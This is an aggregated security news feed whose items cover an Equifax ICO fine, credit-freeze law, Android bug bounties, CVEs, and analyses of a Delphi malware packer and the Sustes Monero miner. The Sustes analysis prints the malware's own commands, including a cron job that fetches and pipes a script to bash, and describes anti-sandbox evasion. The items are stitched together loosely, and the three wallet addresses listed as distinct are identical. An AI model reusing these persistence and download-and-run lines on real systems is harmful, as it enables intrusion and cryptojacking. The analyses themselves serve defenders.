[1] Closing the Cybersecurity Gaps in Financial Services, a global survey from Ovum and sponsored by McAfee

"metadata": {
"id": "ba7ae803-1722-4e9f-98e7-8471653df0f5",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "",
"author": "Gary Davis",
"author-page": "",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "",
"feedimageurl": "",
"pubDate": "Mon 24 Sept 2018 12:35:48 +0000"

The post 5 Ways to Protect Your Finances Online appeared first on McAfee Blogs.

UK ICO Fines Equifax for 2017 Breach

Recently, the UK Information Commissioner’s Office (“ICO”) fined credit rating agency Equifax £500,000 for failing to protect the personal data of up to 15 million UK individuals. The data was compromised during a cyber attack that occurred between May 13 and July 30, 2017, which affected 146 million customers globally. Although Equifax’s systems in the U.S. were targeted, the ICO found the credit agency’s UK arm, Equifax Ltd, failed to take appropriate steps to ensure that its parent firm, which processed this data on its behalf, had protected the information. The ICO investigation uncovered a number of serious contraventions of the UK Data Protection Act 1998 (the “DPA”), resulting in the ICO imposing on Equifax Ltd the maximum fine available.

The compromised UK data was controlled by Equifax Ltd and was processed by Equifax Ltd’s parent company and data processor, Equifax Inc. The breach affected Equifax’s Identity Verifier (“EIV”) dataset, which related to the EIV product, and its GCS dataset. The compromised data included names, telephone numbers, driver’s licence numbers, financial details, dates of birth, security questions and answers (in plain text), passwords (in plain text) and credit card numbers (obscured). The ICO investigation found that there had been breaches of five of the eight data protection principles of the DPA. In particular, the ICO commented in detail on Equifax’s breaches of the fifth and seventh principles and noted the following:

  • Personal data processed for any purpose or purposes shall not be kept for longer than is necessary for that purpose or those purposes (Fifth Principle):
    • In 2016, Equifax Ltd moved the EIV product from the U.S. to be hosted in the UK. Once the EIV product had been migrated to the UK, it was no longer necessary to keep any of the EIV dataset, in particular the compromised UK data, on Equifax Inc.’s systems. The EIV dataset, however, was not deleted from Equifax’s U.S. systems and was subsequently compromised.
    • With respect to the GCS datasets stored on the U.S. system, Equifax Ltd was not sufficiently aware of the purpose(s) for which they were being processed until after the breach. In the absence of a lawful basis for processing (in breach of the First Principle of the DPA), the personal data should have been deleted. The data was not deleted, and Equifax Ltd failed to follow up or check that all UK data had been removed from Equifax’s U.S. systems.
  • Appropriate technical and organizational measures shall be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data (Seventh Principle):
    • Equifax Ltd failed to undertake an adequate risk assessment of the security arrangements that Equifax Inc. had in place, prior to transferring data to Equifax Inc. or following the transfer.
    • Equifax Ltd and Equifax Inc. had various data processing agreements in place; however, these agreements failed to (1) provide appropriate safeguards (not limited to security requirements), and (2) properly incorporate the EU Standard Contractual Clauses (in breach of the Eighth Principle of the DPA).
    • Equifax Ltd had a clear contractual right to audit Equifax Inc.’s compliance with its obligations under the aforementioned data processing agreements. Despite this right, Equifax Ltd failed to exercise it to check Equifax Inc.’s compliance with its obligations.
    • Communication procedures between Equifax Ltd and Equifax Inc. were deemed inadequate. In particular, this was highlighted by the delay of over one month between Equifax Inc. becoming aware of the breach and Equifax Ltd being informed of it.
    • Equifax Ltd failed to ensure adequate security measures were in place or notice that Equifax Inc. had failed to take such measures, including:
      • failing to adequately encrypt personal data or protect user passwords. The ICO did not accept Equifax Ltd’s reasons (i.e., fraud prevention and password analysis) for storing passwords in a plaintext file, particularly as it was a direct breach of Equifax Ltd’s own Cryptology Standards, and the stated aims could be achieved by other more secure means;
      • failing to address known IT vulnerabilities, including those identified and reported to senior employees. In particular, Equifax had been warned about a critical vulnerability in its systems by the U.S. Department of Homeland Security in March 2017. This vulnerability was given a score of 10.0 on the Common Vulnerability Scoring System (“CVSS”). A CVSS score of 10.0 is the highest score, indicating a critical vulnerability that requires immediate attention. Equifax Inc. failed to patch all vulnerable systems and this vulnerability in its consumer-facing disputes portal was exploited by the cyber attack; and
      • not having fully up-to-date software, failing to undertake sufficient and regular system scans, and failing to ensure appropriate network segregation (some UK data was stored together with U.S. data, making it difficult to differentiate).
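On the password point above: the control regulators expect is salted key derivation rather than plaintext storage. As an illustrative sketch only (not Equifax's actual systems or remediation), using Python's standard library:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=200_000):
    """Derive a salted PBKDF2-HMAC-SHA256 digest.

    Store (salt, iterations, digest); never the plaintext password.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

def verify_password(password, salt, iterations, digest):
    """Recompute the digest and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)
```

Note that fraud-prevention analytics (the justification the ICO rejected) can usually be run on hashed or tokenized values rather than plaintext.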

Since the breach occurred prior to May 25, 2018, it was dealt with in accordance with the DPA. The Equifax fine represents the maximum available under the DPA; given the aggravating factors identified by the ICO, including the number of affected data subjects, the type of data at risk, and the multiple, systematic and serious inadequacies, the fine would likely have been considerably higher had the EU General Data Protection Regulation been in force when the breach occurred.

Data Breaches: User Comprehension, Expectations, and Concerns with Handling Exposed Data

Data exposed by breaches persist as a security and privacy threat for Internet users. Despite this, best practices for how companies should respond to breaches, or how to responsibly handle data after it is leaked, have yet to be identified. We bring users into this discussion through two surveys. In the first, we examine the comprehension of 551 participants on the risks of data breaches and their sentiment towards potential remediation steps. In the second survey, we ask 10,212 participants to rate their level of comfort towards eight different scenarios that capture real world examples of security practitioners, researchers, journalists, and commercial entities investigating leaked data. Our findings indicate that users readily understand the risk of data breaches and have consistent expectations for technical and non-technical remediation steps. We also find that participants are comfortable with applications that examine leaked data—such as threat sharing or a “hacked or not” service when the application has a direct, tangible security benefit. Our findings help to inform a broader discussion on responsible uses of data exposed by breaches.

An Infinite Door – Paul’s Security Weekly #576

This week, Paul interviews Mike Ahmadi, Global Director of IoT Security Solutions at DigiCert! Apollo Clark delivers the Technical Segment on Threat Hunting in the Cloud! In the Security News this week: the Senate can't protect senators' staff from cyber attacks, Equifax is fined by the ICO over the data breach that hit Britons, a US judge allows e-voting despite hack fears, a zero day in Internet-connected cameras, the US military is given the power to hack back and defend forward, and the AmazonBasics Microwave works with Alexa!



→Visit https://www.activecountermeasures.com/psw to sign up for a demo or buy our AI Hunter!!


New Federal Credit Freeze Law Eliminates Fees, Provides for Year-Long Fraud Alerts

Effective September 21, 2018, Section 301 of the Economic Growth, Regulatory Relief, and Consumer Protection Act (the “Act”) requires consumer reporting agencies to provide free credit freezes and year-long fraud alerts to consumers throughout the country. Under the Act, consumer reporting agencies must each set up a webpage designed to enable consumers to request credit freezes, fraud alerts, extended fraud alerts and active duty fraud alerts. The webpage must also give consumers the ability to opt out of the use of information in a consumer report to send the consumer a solicitation of credit or insurance. Consumers may find links to these webpages on the Federal Trade Commission’s Identity Theft website.

The Act also enables parents and guardians to freeze their children’s credit if they are under age 16. Guardians or conservators of incapacitated persons may also request credit freezes on their behalf.

Section 302 of the Act provides additional protections for active duty military. Under this section, consumer reporting agencies must offer free electronic credit monitoring to all active duty military.

For more information, read the FTC’s blog post.

IDG Contributor Network: Open banking is coming to the U.S.: How secure will it be?

The open banking trend continues around the world, and most recently, the U.S. has taken another step towards adopting the policy. On July 31, the U.S. Department of the Treasury published a detailed report, titled A Financial System That Creates Economic Opportunities: Nonbank Financials, Fintech, and Innovation, that will likely serve as the catalyst for open banking in the United States.

The Department of Treasury places the U.S. on a growing list of nations that are modernizing their financial systems, including the UK, the European Union, South Korea, Singapore, Australia, Canada, and Japan. Traditional banks are modernizing through open banking and digital transformation to acquire and retain customers and remain competitive.


Apple to Require Privacy Policies for All New Apps and App Updates

On August 30, 2018, Apple Inc. announced that a June update to its App Store Review Guidelines will require each developer to provide a privacy policy as part of the app review process, and to meet specific content requirements in that policy. Effective October 3, 2018, all new apps and app updates must include a link to the developer’s privacy policy before they can be submitted for distribution to users through the App Store or through TestFlight external testing.

The privacy policy must detail what data the app gathers, how the data will be collected and how such data will be used. The policy also must confirm that third parties with whom an app shares user data will provide the same or equal protection of user data as stated in the app’s privacy policy and the App Store Review Guidelines. Lastly, the policy must explain the developer’s data retention policy, as well as include information on how users can revoke consent to data collection or request deletion of the collected user data. Developers will be able to edit an app’s privacy policy only when submitting a new version of the app.

Android and Google Play Security Rewards Programs surpass $3M in payouts

Posted by Jason Woloz and Mayank Jain, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

Our Android and Play security reward programs help us work with top researchers from around the world to improve Android ecosystem security every day. Thank you to all the amazing researchers who submitted vulnerability reports.

Android Security Rewards

In the ASR program's third year, we received over 470 qualifying vulnerability reports from researchers and the average pay per researcher jumped by 23%. To date, the ASR program has rewarded researchers with over $3M, paying out roughly $1M per year.
Here are some of the highlights from the Android Security Rewards program's third year:
  • There were no payouts for our highest possible reward: a complete remote exploit chain leading to TrustZone or Verified Boot compromise.
  • 99 individuals contributed one or more fixes.
  • The ASR program's reward averages were $2,600 per reward and $12,500 per researcher.
  • Guang Gong received our highest reward amount to date: $105,000 for his submission of a remote exploit chain.
As part of our ongoing commitment to security we regularly update our programs and policies based on ecosystem feedback. We also updated our severity guidelines for evaluating the impact of reported security vulnerabilities against the Android platform.

Google Play Security Rewards

In October 2017, we rolled out the Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play. So far, researchers have reported over 30 vulnerabilities through the program, earning a combined bounty amount of over $100K.
If undetected, these vulnerabilities could have potentially led to elevation of privilege, access to sensitive data and remote code execution on devices.

Keeping devices secure

In addition to rewarding for vulnerabilities, we continue to work with the broad and diverse Android ecosystem to protect users from issues reported through our program. We collaborate with manufacturers to ensure that these issues are fixed on their devices through monthly security updates. Over 250 device models have a majority of their deployed devices running a security update from the last 90 days. The following table shows the models with a majority of deployed devices running a security update from the last three months:

Asus: ZenFone 5Z (ZS620KL/ZS621KL), ZenFone Max Plus M1 (ZB570TL), ZenFone 4 Pro (ZS551KL), ZenFone 5 (ZE620KL), ZenFone Max M1 (ZB555KL), ZenFone 4 (ZE554KL), ZenFone 4 Selfie Pro (ZD552KL), ZenFone 3 (ZE552KL), ZenFone 3 Zoom (ZE553KL), ZenFone 3 (ZE520KL), ZenFone 3 Deluxe (ZS570KL), ZenFone 4 Selfie (ZD553KL), ZenFone Live L1 (ZA550KL), ZenFone 5 Lite (ZC600KL), ZenFone 3s Max (ZC521TL)
BlackBerry: BlackBerry MOTION, BlackBerry KEY2
Blu: Grand XL LTE, Vivo ONE, R2_3G, Grand_M2, BLU STUDIO J8 LTE
bq: Aquaris V Plus, Aquaris V, Aquaris U2 Lite, Aquaris U2, Aquaris X, Aquaris X2, Aquaris X Pro, Aquaris U Plus, Aquaris X5 Plus, Aquaris U lite, Aquaris U
Docomo: F-04K, F-05J, F-03H
Essential Products: PH-1
General Mobile: GM8, GM8 Go
Google: Pixel 2 XL, Pixel 2, Pixel XL, Pixel
HTC: U12+, HTC U11+
Huawei: Honor Note10, nova 3, nova 3i, Huawei Nova 3I, 荣耀9i, 华为G9青春版, Honor Play, G9青春版, P20 Pro, Honor V9, huawei nova 2, P20 lite, Honor 10, Honor 8 Pro, Honor 6X, Honor 9, nova 3e, P20, PORSCHE DESIGN HUAWEI Mate RS, FRD-L02, HUAWEI Y9 2018, Huawei Nova 2, Honor View 10, HUAWEI P20 Lite, Mate 9 Pro, Nexus 6P, HUAWEI Y5 2018, Honor V10, Mate 10 Pro, Mate 9, Honor 9 Lite, 荣耀9青春版, nova 2i, HUAWEI nova 2 Plus, P10 lite, nova 青春版本, FIG-LX1, HUAWEI G Elite Plus, HUAWEI Y7 2018, Honor 7S, HUAWEI P smart, P10, Honor 7C, 荣耀8青春版, HUAWEI Y7 Prime 2018, P10 Plus, 荣耀畅玩7X, HUAWEI Y6 2018, Mate 10 lite, Honor 7A, P9 Plus, 华为畅享8, honor 6x, HUAWEI P9 lite mini, HUAWEI GR5 2017, Mate 10
Lanix: Alpha_950, Ilium X520
Lava: Z61, Z50
LGE: LG Q7+, LG G7 ThinQ, LG Stylo 4, LG K30, V30+, LG V35 ThinQ, Stylo 2 V, LG K20 V, ZONE4, LG Q7, DM-01K, Nexus 5X, LG K9, LG K11
Motorola: Moto Z Play Droid, moto g(6) plus, Moto Z Droid, Moto X (4), Moto G Plus (5th Gen), Moto Z (2) Force, Moto G (5S) Plus, Moto G (5) Plus, moto g(6) play, Moto G (5S), moto e5 play, moto e(5) play, moto e(5) cruise, Moto E4, Moto Z Play, Moto G (5th Gen)
Nokia: Nokia 8, Nokia 7 plus, Nokia 6.1, Nokia 8 Sirocco, Nokia X6, Nokia 3.1
OnePlus: OnePlus 6, OnePlus5T, OnePlus3T, OnePlus5, OnePlus3
Oppo: CPH1803, CPH1821, CPH1837, CPH1835, CPH1819, CPH1719, CPH1613, CPH1609, CPH1715, CPH1861, CPH1831, CPH1801, CPH1859, A83, R9s Plus
Positivo: Twist, Twist Mini
Samsung: Galaxy A8 Star, Galaxy J7 Star, Galaxy Jean, Galaxy On6, Galaxy Note9, Galaxy J3 V, Galaxy A9 Star, Galaxy J7 V, Galaxy S8 Active, Galaxy Wide3, Galaxy J3 Eclipse, Galaxy S9+, Galaxy S9, Galaxy A9 Star Lite, Galaxy J7 Refine, Galaxy J7 Max, Galaxy Wide2, Galaxy J7(2017), Galaxy S8+, Galaxy S8, Galaxy A3(2017), Galaxy Note8, Galaxy A8+(2018), Galaxy J3 Top, Galaxy J3 Emerge, Galaxy On Nxt, Galaxy J3 Achieve, Galaxy A5(2017), Galaxy J2(2016), Galaxy J7 Pop, Galaxy A6, Galaxy J7 Pro, Galaxy A6 Plus, Galaxy Grand Prime Pro, Galaxy J2 (2018), Galaxy S6 Active, Galaxy A8(2018), Galaxy J3 Pop, Galaxy J3 Mission, Galaxy S6 edge+, Galaxy Note Fan Edition, Galaxy J7 Prime, Galaxy A5(2016)
Sharp: シンプルスマホ4, AQUOS sense plus (SH-M07), AQUOS R2 SH-03K, X4, AQUOS R SH-03J, AQUOS R2 SHV42, X1, AQUOS sense lite (SH-M05)
Sony: Xperia XZ2 Premium, Xperia XZ2 Compact, Xperia XA2, Xperia XA2 Ultra, Xperia XZ1 Compact, Xperia XZ2, Xperia XZ Premium, Xperia XZ1, Xperia L2, Xperia X
Tecno: F1, CAMON I Ace
Vestel: Vestel Z20
Vivo: vivo 1805, vivo 1803, V9 6GB, Y71, vivo 1802, vivo Y85A, vivo 1726, vivo 1723, V9, vivo 1808, vivo 1727, vivo 1724, vivo X9s Plus, Y55s, vivo 1725, Y66, vivo 1714, 1609, 1601
Vodafone: Vodafone Smart N9
Xiaomi: Mi A2, Mi A2 Lite, MI 8, MI 8 SE, MIX 2S, Redmi 6Pro, Redmi Note 5 Pro, Redmi Note 5, Mi A1, Redmi S2, MI MAX 2, MI 6X

Thank you to everyone internally and externally who helped make Android safer and stronger in the past year. Together, we made a huge investment in security research that helps Android users everywhere. If you want to get involved to make next year even better, check out our detailed program rules. For tips on how to submit complete reports, see Bug Hunter University.

Increased Use of a Delphi Packer to Evade Malware Classification


The concept of "packing" or "crypting" a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware "FUD" or "Fully Undetectable" by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

Delphi Code to the Rescue

The samples we inspected carried the Delphi signature (Figure 1), and analysis with IDR (Interactive Delphi Reconstructor) showed code constructs consistent with Delphi.

Figure 1: Delphi signature in sample

The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application "look legit" during dynamic analysis. Figure 2 shows the forum post of an actor discussing this technique.

Figure 2: Underground forum post of an actor discussing technique

Distribution Campaigns

We have observed many spam campaigns with different themes that drop payloads packed using this packer.

An example is a typical SWIFT transfer themed spam that carries a document file as an attachment (hash: 71cd5df89e3936bb39790010d6d52a2d), which leverages malicious macros to drop the payload. The spam email is shown in Figure 3.

Figure 3: Spam example 1

Another example is a typical quotation-themed spam that carries an exploit document file as an attachment (hash: 0543e266012d9a3e33a9688a95fce358), which leverages an Equation Editor vulnerability to drop the payload (Figure 4).

Figure 4: Spam example 2

The documents in both examples fetched a payload that turned out to be Lokibot malware.

User Activity Checks

The packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses the GetForegroundWindow API to check that the user changes windows at least three times before it executes further. If it does not see the windows change, it puts itself into an infinite sleep. The code is shown in Figure 5. Interestingly, some of the publicly available sandboxes can be detected by this simple technique.

Figure 5: Window change check
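The check FireEye describes can be modeled in a few lines. The sketch below is a simulation, not the packer's Delphi code: the window-handle getter is injectable for testing, where a real implementation would call the Win32 GetForegroundWindow API.

```python
def wait_for_user_activity(get_foreground_window, required_changes=3, max_polls=1000):
    """Return True once the foreground window has changed `required_changes`
    times; return False if it never does (the packer instead sleeps forever)."""
    changes = 0
    last = get_foreground_window()
    for _ in range(max_polls):
        current = get_foreground_window()
        if current != last:
            changes += 1
            last = current
        if changes >= required_changes:
            return True
    return False
```

A sandbox that renders a single static desktop window never satisfies the check, which is why this simple technique defeats several public sandboxes.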

To confirm user activity, a second variant of the packer checks for mouse cursor movement using GetCursorPos and Sleep APIs, while a third variant checks for system idle state using GetLastInputInfo and GetTickCount APIs.

Extracting Real Payloads from the PE Resources

The original payload is split into multiple binary blobs and stored in various locations inside the resource directory, as shown in Figure 6.

Figure 6: Bitmap resource with encrypted contents

To locate and assemble the real payload bytes, the packer code first reads content directly from a hardcoded resource ID inside the resource section. The first 16 bytes of this form an XOR key used to decrypt the rest of the bytes using a rolling XOR. The decrypted bytes actually represent an internal data structure, as shown in Figure 7, used by the packer to reference encrypted and obfuscated buffers at various resource IDs.

Figure 7: Structure showing encrypted file information

The packer then reads values from the encrypted buffers, starting from dwStartResourceId to dwStartResourceId+dwNumberOfResources, and brings them to a single location by reading chunks of dwChunkSize. Once the final data buffer is prepared, it starts decrypting it using the same rolling XOR algorithm mentioned previously and the new key from the aforementioned structure, producing the core payload executable. This script can be used to extract the real payload statically.
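The decryption scheme as described is easy to reproduce. A minimal sketch, assuming "rolling XOR" means the 16-byte key is applied cyclically over the buffer (the resource-walking and chunk-reassembly steps are omitted):

```python
def rolling_xor(data, key):
    """XOR `data` against `key` repeated cyclically; symmetric, so the same
    function both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def extract_payload(resource_bytes):
    """Per the scheme above: the first 16 bytes are the XOR key, the rest
    is the encrypted structure or payload."""
    key, encrypted = resource_bytes[:16], resource_bytes[16:]
    return rolling_xor(encrypted, key)
```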

Classification of Real Families

Many of the unpacked binaries that we were able to extract from the sample set were identified as belonging to the Lokibot malware family. We were also able to identify Pony, IRStealer, Nanocore, Netwire, Remcos, and nJRAT malware families, as well as a coin mining malware family, among others. A distribution of the malware families using the packer is shown in Figure 8. This diversity of malware families implies that many threat actors are using this "crypting" service/tool for their operations, possibly buying it from the developer itself.

Figure 8: Distribution of malware families using packer


Packer and crypter services provide threat actors an easy and convenient option for outsourcing the work of keeping their real payloads undetected and unclassified for as long as possible. Threat actors regularly find nifty ways to bypass sandbox environments with anti-analysis techniques; hence, detonating malware samples in a sandbox environment that models real user behavior is a safe bet.

FireEye MVX Engine both detects and blocks this activity.

Indicators of Compromise (IOCs)

  • 853bed3ad5cc4b1471e959bfd0ea7c7c
  • e3c421d404c08809dd8ee3365552e305
  • 14e5326c5da90cd6619b7fe1bc4a97e1
  • dc999a1a2c5e796e450c0a6a61950e3f
  • 3ad781934e67a8b84739866b0b55544b
  • b4f5e691b264103b9c4fb04fa3429f1e

Tick That Box – Enterprise Security Weekly #107

This week, Doug White and Matt Alderman talk about Big Time IT Audit Mistakes in the Enterprise! In the Enterprise News this week: Cisco aims to make security foundational throughout its business, Fidelis looks to grow its cyber-security platform, how artificial intelligence can improve human decision-making in IoT apps, Crossmatch announces the availability of DigitalPersona v3.0, and video fingerprinting. All that and more on this episode of Enterprise Security Weekly!




Visit https://www.activecountermeasures.com/esw to sign up for a demo or buy our AI Hunter!



Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis of a fascinating threat that I like to call Sustes (you will see the genesis of the name in a bit).

Everybody knows the Monero cryptocurrency, and probably everybody knows that it was built upon privacy, meaning it's not that simple to figure out a Monero wallet's balance. Sustes is a nice example of pirate mining, and even if it's hard to figure out its magnitude, since the attacker built up private pool proxies, I believe it's worth putting the wallet addresses on record and sharing IoCs for future protection. So, let's have a closer look at it.

Monero stops you trying to check wallet balance
Sustes malware doesn't infect victims by itself (it's not a worm); it is spread via exploitation and brute-force activity, with a special focus on IoT devices and Linux servers. The initial infection stage is a custom wget (http://192[.]99[.]142[.]226:8220/) run directly on the victim machine, followed by execution through /bin/bash. The dropped script is a simple bash script which drops and executes additional software, with a bit of spice. The following code represents its content as of today (ref. blog post date).

An initial connection check tries to take down unwanted software on the victim side (awk '{print $7}' | sed -e "s/\/.*//g"), making decisions based on specific IP addresses. It extracts PIDs from connection states and kills them directly (kill -9). The attacker's unwanted communication endpoints are the following:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
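For illustration, the awk/sed filtering quoted above can be approximated in Python. This is a reimplementation sketch of the bash logic, assuming `netstat -antp`-style columns, not the malware's own code:

```python
BLOCKLIST = {
    "103.99.115.220", "104.160.171.94", "121.18.238.56", "170.178.178.57",
    "27.155.87.59", "52.15.62.13", "52.15.72.79", "91.236.182.1",
}

def pids_to_kill(netstat_lines):
    """Yield PIDs of connections whose remote address is blocklisted,
    mimicking awk '{print $7}' | sed -e "s/\\/.*//g" over netstat -antp output."""
    for line in netstat_lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        remote_ip = fields[4].rsplit(":", 1)[0]   # strip the port
        if remote_ip in BLOCKLIST:
            yield fields[6].split("/", 1)[0]      # "1234/curl" -> "1234"
```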
A second check looks at command-line arguments. Sustes greps for configuration files (for example: wc.conf, wq.conf and wm.conf), then looks for software names such as sustes (here we go!) and kills everything that matches the grep. The script then assigns the dropping site (192[.]99[.]142[.]226:8220) to the f2 variable and later calls f2 with specific paths appended (for example: /xm64 and wt.conf) in order to drop crafted components. MR.SH then runs the dropped software with its configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

MR.SH ends by setting up a crontab entry that periodically re-downloads and re-executes the script itself:

crontab -l 2>/dev/null; echo "* * * * * $LDR | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from the dropping URL, we can observe the Monero wallet addresses and the Monero pools used by the attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analysis of the Monero pools in use led me to believe the attacker built up custom, private Monero pool proxies (deployed on private infrastructure); for that reason, it would be wise to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes, and it is a basic XMRig, the well-known open-source miner. In this scenario it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as initial proof of the software's identity.

XMRIG prove 1

Many people are currently wondering what the sustes process draining so many PC resources is... now we have an answer: it's an unwanted miner. :D

Hope you had fun

  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

CVE-2018-17231 (telegram_desktop)

** DISPUTED ** Telegram Desktop (aka tdesktop) 1.3.14 might allow attackers to cause a denial of service (assertion failure and application exit) via an "Edit color palette" search that triggers an "index out of range" condition. NOTE: this issue is disputed by multiple third parties because the described attack scenario does not cross a privilege boundary.

Canadian Regulator Seeks Public Comment on Breach Reporting Guidance

As reported in BNA Privacy Law Watch, the Office of the Privacy Commissioner of Canada (the “OPC”) is seeking public comment on recently released guidance (the “Guidance”) intended to assist organizations with understanding their obligations under the federal breach notification mandate, which will take effect in Canada on November 1, 2018. 

Breach notification in Canada has historically been governed at the provincial level, with only Alberta requiring omnibus breach notification. As we previously reported, effective November 1, organizations subject to the federal Personal Information Protection and Electronic Documents Act (“PIPEDA”) will be required to notify affected individuals and the OPC of security breaches involving personal information “that pose a real risk of significant harm to individuals.” The Guidance, which is structured in a question-and-answer format, is intended to assist companies with complying with the new reporting obligation. The Guidance describes, among other information, (1) who is responsible for reporting a breach, (2) what types of incidents must be reported, (3) how to determine whether there is a “real risk of significant harm,” (4) what information must be included in a notification to the OPC and affected individuals, and (5) an organization’s recordkeeping requirements with respect to breaches of personal information, irrespective of whether such breaches are notifiable. The Guidance also contains a proposed breach reporting form for notifying the OPC pursuant to the new notification obligation.

The OPC is accepting public comment on the Guidance, including on the proposed breach reporting form. The deadline for interested parties to submit comments is October 2, 2018.

CVE-2018-17205 (openstack, openvswitch, virtualization)

An issue was discovered in Open vSwitch (OvS) 2.7.x through 2.7.6, affecting ofproto_rule_insert__ in ofproto/ofproto.c. During bundle commit, flows that are added in a bundle are applied to ofproto in order. If a flow cannot be added (e.g., the flow action is a go-to for a group id that does not exist), OvS tries to revert back all previous flows that were successfully applied from the same bundle. This is possible since OvS maintains list of old flows that were replaced by flows from the bundle. While reinserting old flows, OvS has an assertion failure due to a check on rule state != RULE_INITIALIZED. This would work for new flows, but for an old flow the rule state is RULE_REMOVED. The assertion failure causes an OvS crash.
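The failure mode is easier to see as a toy model. The sketch below is a conceptual Python model of the state check described above (OvS itself is C; the state names are borrowed from the advisory, everything else is illustrative):

```python
INITIALIZED, INSERTED, REMOVED = "RULE_INITIALIZED", "RULE_INSERTED", "RULE_REMOVED"

class Rule:
    def __init__(self):
        self.state = INITIALIZED

def insert_rule(rule):
    # Mirrors the ofproto_rule_insert__ check: only brand-new rules pass.
    assert rule.state == INITIALIZED, "assertion failure: OvS crashes here"
    rule.state = INSERTED

def remove_rule(rule):
    rule.state = REMOVED

# A bundle replaces an old flow, then a later flow in the bundle fails to add,
# so OvS reverts by reinserting the old flow, whose state is now RULE_REMOVED.
```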

CVE-2018-17204 (openstack, openvswitch, virtualization)

An issue was discovered in Open vSwitch (OvS) 2.7.x through 2.7.6, affecting parse_group_prop_ntr_selection_method in lib/ofp-util.c. When decoding a group mod, it validates the group type and command after the whole group mod has been decoded. The OF1.5 decoder, however, tries to use the type and command earlier, when it might still be invalid. This causes an assertion failure (via OVS_NOT_REACHED). ovs-vswitchd does not enable support for OpenFlow 1.5 by default.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

